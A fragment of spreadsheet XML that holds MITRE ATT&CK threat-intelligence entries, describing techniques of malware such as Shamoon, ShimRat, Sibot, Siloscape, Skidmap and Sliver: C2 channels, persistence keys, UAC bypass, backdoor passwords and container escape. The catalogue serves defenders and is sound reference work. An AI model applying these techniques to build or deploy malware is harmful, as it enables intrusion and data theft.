    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Shamoon](https://attack.mitre.org/software/S0140) will reboot the infected system once the wiping functionality has been completed.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)	</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Shamoon](https://attack.mitre.org/software/S0140) can change the modified time for files to evade forensic detection.(Citation: McAfee Shamoon December 2018)	</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can impersonate tokens using &lt;code&gt;LogonUser&lt;/code&gt;, &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;, and &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;.(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. Newer versions create the "MaintenaceSrv" and "hdv_725x" services.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can use DNS in C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has stored information in folders named `U1` and `U2` prior to exfiltration.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can upload files to its C2.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can extract and decrypt downloaded .zip files.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can send DNS C2 communications using a unique domain generation algorithm.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can update its configuration to use a different C2 server.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can delete files downloaded to the compromised host.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019)  can download additional files from its C2 via HTTP or DNS.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can use encrypted and encoded files for C2 configuration.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can pause C2 communications for a specified time.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can stop execution if the screen width of the targeted machine is not over 600 pixels.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can collect the GUID of a targeted machine.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has the ability to use HTTP in C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has the ability to use `CMD` to execute commands.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has decompressed data received from the C2 server.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to download and execute additional payloads via a DropBox API.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with PowerShell.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has the ability to create persistence for the malware using the Registry autorun key and startup folder.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has a persistence component to write a scheduled task for the payload.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to capture the victim's screen.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has checked the system settings to see if Arabic is the configured language.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546)  has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has used a legitimate web service for evading detection.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with the command line.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can use WMI for execution.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed shim databases in the &lt;code&gt;AppPatch&lt;/code&gt; folder.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) has the capability to upload collected files to a C2.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can use pre-configured HTTP proxies.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) has used a secondary C2 location if the first was unavailable.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can list directories.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can impersonate Windows services and antivirus products to avoid detection on compromised systems.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has registered two registry keys for shim databases.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) has used Windows API functions to install the service and shim.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can enumerate connected drives for infected host machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a registry based start-up key &lt;code&gt;HKCU\Software\microsoft\windows\CurrentVersion\Run&lt;/code&gt; to maintain persistence should other methods fail.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) can sleep when instructed to do so by the C2.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444)'s loader has been packed with the compressed [ShimRat](https://attack.mitre.org/software/S0444) core DLL and the legitimate DLL for it to hijack.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can be issued a command shell function from the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a Windows service to maintain persistence on victim machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all non-privileged and privileged accounts available on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRatReporter](https://attack.mitre.org/software/S0445) used LZ compression to compress initial reconnaissance reports before sending to the C2.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent collected system and network information compiled into a report to an adversary-controlled C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent generated reports to the C2 via HTTP POST requests.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) had the ability to download additional payloads.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) spoofed itself as &lt;code&gt;AlphaZawgyl_font.exe&lt;/code&gt;, a specialized Unicode font.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used several Windows API functions to gather information from the infected system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) encrypted gathered information with a combination of shifting and XOR using a static key.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local privileges for the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all running processes on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered a list of installed software on the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the operating system name and specific Windows version of an infected machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used the Windows function &lt;code&gt;GetExtendedUdpTable&lt;/code&gt; to detect connected UDP endpoints.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can decrypt data received from a C2 and save to a file.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete itself if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete an associated registry key if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can download and execute a payload onto a compromised system.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has downloaded a DLL to the &lt;code&gt;C:\windows\system32\drivers\&lt;/code&gt; folder and renamed it with a &lt;code&gt;.sys&lt;/code&gt; extension.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has installed a second-stage script in the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot&lt;/code&gt; registry key.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has obfuscated scripts used in execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has queried the registry for proxy server information.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has executed downloaded DLLs with &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via a scheduled task.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) checked if the compromised system is configured to use proxies.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has retrieved a GUID associated with a present LAN connection on a compromised machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Sibot](https://attack.mitre.org/software/S0589) executes commands using VBScript.(Citation: MSTIC NOBELIUM Mar 2021)	</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) communicated with its C2 server via HTTP GET requests.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used a legitimate compromised website to download DLLs to the victim's machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used WMI to discover network connections and configurations. [Sibot](https://attack.mitre.org/software/S0589) has also used the Win32_Process class to execute a malicious DLL.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can embed C2 responses in the source code of a fake Flickr webpage.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to upload files from a compromised host.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can decode and decrypt messages received from C2.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has exfiltrated data over its C2 channel.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has primarily used port 443 for C2 but can use port 80 as a fallback.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to search for specific files.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to download additional files.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can use &lt;code&gt;GetUserNameW&lt;/code&gt;, &lt;code&gt;GetComputerNameW&lt;/code&gt;, and &lt;code&gt;GetComputerNameExW&lt;/code&gt; to gather information.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has used Base64 for encoded C2 traffic.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can encrypt C2 communications with a randomly generated key.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can collect the computer name of a targeted system.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to collect the domain name on a compromised host.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can collect the username on a targeted system.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has used HTTP GET and POST requests over port 443 for C2.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can execute shell commands on a compromised host.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) connects to an IRC server for C2.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) has decrypted the password of the C2 server with a simple byte by byte XOR. [Siloscape](https://attack.mitre.org/software/S0623) also writes both an archive of [Tor](https://attack.mitre.org/software/S0183) and the &lt;code&gt;unzip&lt;/code&gt; binary to disk from data embedded within the payload using Visual Studio’s Resource Manager.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) maps the host’s C drive to the container by creating a global symbolic link to the host through the calling of &lt;code&gt;NtSetInformationSymbolicLink&lt;/code&gt;.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Siloscape](https://attack.mitre.org/software/S0623) is executed after the attacker gains initial access to a Windows container using a known vulnerability.(Citation: Unit 42 Siloscape Jun 2021) </t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) has leveraged a vulnerability in Windows containers to perform an [Escape to Host](https://attack.mitre.org/techniques/T1611).(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Siloscape](https://attack.mitre.org/software/S0623) searches for the Kubernetes config file and other related files using a regular expression.(Citation: Unit 42 Siloscape Jun 2021) </t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) uses Tor to communicate with C2.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) makes various native API calls.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) itself is obfuscated and uses obfuscated API calls.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) checks for Kubernetes node permissions.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) searches for the kubectl binary.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) impersonates the main thread of &lt;code&gt;CExecSvc.exe&lt;/code&gt; by calling &lt;code&gt;NtImpersonateThread&lt;/code&gt;.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) can run cmd through an IRC channel.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Skeleton Key](https://attack.mitre.org/software/S0007) is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has installed itself via crontab.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download, unpack, and decrypt tar.gz files .(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to set SELinux to permissive mode.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has checked for the existence of specific files including &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; and &lt;code&gt; /etc/selinux/config&lt;/code&gt;. It also has the ability to monitor the cryptocurrency miner file and process. (Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download files on an infected host.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to install several loadable kernel modules (LKMs) on infected machines.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has created a fake &lt;code&gt;rm&lt;/code&gt; binary to replace the legitimate Linux binary.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has encrypted it's main payload using 3DES.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has monitored critical processes to ensure resiliency.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to add the public key of its handlers to the &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on an infected host.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check if &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; exists. This file controls what mode SELinux is in.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has used &lt;code&gt;pm.sh&lt;/code&gt; to download and install its main payload.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) has the ability to manipulate user tokens on targeted Windows systems.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can use mutual TLS and RSA  cryptography to exchange a session key.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver Encryption)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can support C2 communications over DNS.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2 DNS)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can exfiltrate files from the victim using the &lt;code&gt;download&lt;/code&gt; command.(Citation: GitHub Sliver Download)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can enumerate files on a target system.(Citation: GitHub Sliver File System August 2021)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can upload files from the C2 server to the victim machine using the &lt;code&gt;upload&lt;/code&gt; command.(Citation: GitHub Sliver Upload)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can encrypt strings at compile time.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can inject code into local and remote processes.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can take screenshots of the victim’s active display.(Citation: GitHub Sliver Screen)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.(Citation: GitHub Sliver HTTP)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can encode binary data into a .PNG file for C2 communication.(Citation: GitHub Sliver HTTP)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can use AES-GCM-256 to encrypt a session key for C2 message exchange.(Citation: GitHub Sliver Encryption)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) has the ability to gather network configuration information.(Citation: GitHub Sliver Ifconfig)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can collect network connection information.(Citation: GitHub Sliver Netstat)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Sliver](https://attack.mitre.org/software/S0633) has the ability to support C2 communications over HTTP/S.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use SSL/TLS for its HTTPS Telegram Bot API-based C2 channel.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to use the Telegram Bot API from Telegram Messenger to send and receive messages.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can only execute correctly if the word `Platypus` is passed to it on the command line.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to download files.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use variations of Microsoft and Outlook spellings, such as "Microsift", in its file names to avoid detection.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to use a custom hex byte swapping encoding scheme combined with an obfuscated Base64 function to protect program strings and Telegram credentials.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use Python scripts to execute commands.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
